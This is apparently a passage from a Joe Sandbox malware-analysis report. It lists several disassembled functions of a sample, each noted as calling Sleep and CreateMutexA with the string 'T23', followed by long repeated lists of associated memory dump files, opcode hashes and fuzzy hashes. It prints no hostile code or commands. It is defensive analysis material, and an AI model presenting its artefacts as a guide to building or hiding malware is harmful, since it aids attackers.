Function 002D9F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 3940d0b5d8cc6ea696785a66bee5234c84eca4dd155bce1ecdd2b83517ac827f
Instruction ID: aa091378818c8c8aebd7d7b34e6bad38cc0396c5c90bc2550f47bd265e293714
Opcode Fuzzy Hash: 3940d0b5d8cc6ea696785a66bee5234c84eca4dd155bce1ecdd2b83517ac827f
Instruction Fuzzy Hash: E43168317241408FEB18EB78DC99BADB766EF85310F20861AF018D77D1C7758DA08752

Function 002DA079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: e48b5f1dba8a620f7c0d91f0fc05083c30b4d196c12f34b77a55d7ba45396d51
Instruction ID: 0b23f250d651a36e3360e5017e6fe8e000600ae16da09f43b7769753275ba7a7
Opcode Fuzzy Hash: e48b5f1dba8a620f7c0d91f0fc05083c30b4d196c12f34b77a55d7ba45396d51
Instruction Fuzzy Hash: B43124317642409BEB08DB78DC89FADB766EB85310F24861AE018D73E5C7769DA08662

Function 002DA1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: a28f793a255bca5977a082cfd3e00ef09fe67eeab6d0ea9a8f9c3a51c18f3b6a
Instruction ID: d8c87ad0429b828f9c759c58a3faed81db41f76303709e192616bcc31d89c196
Opcode Fuzzy Hash: a28f793a255bca5977a082cfd3e00ef09fe67eeab6d0ea9a8f9c3a51c18f3b6a
Instruction Fuzzy Hash: F73146317641409BEB089B79DC8DFADB766AF86310F20861AE418973E1C7769DA08752

Function 002DA418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 22c165a054e11b7d8510fdfba291a24d3bda45c6f5431ad991ce8d0134ae0032
Instruction ID: 2898ea5a93f26e2da98cc795eddc474fb2acd0bfa82fabadf08a8ee8e52d164f
Opcode Fuzzy Hash: 22c165a054e11b7d8510fdfba291a24d3bda45c6f5431ad991ce8d0134ae0032
Instruction Fuzzy Hash: B5316A317211408BEB08EB78D8DEFADB766DF85310F20821AE0189B3D5C7B54DA08662

Function 002DA54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 264750d5d0d800701ad8e3bba00fdd8206429605f1a9eb870520a989c6637cae
Instruction ID: abe071fffb317fd191d5df4f0500b821dd831d09745d89ae27fe52e53975573a
Opcode Fuzzy Hash: 264750d5d0d800701ad8e3bba00fdd8206429605f1a9eb870520a989c6637cae
Instruction Fuzzy Hash: DB314A31B251408BEB08DB78ECD9FADB766EF85314F24861AE014DB3D5C7758DA08752

Function 002DA682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
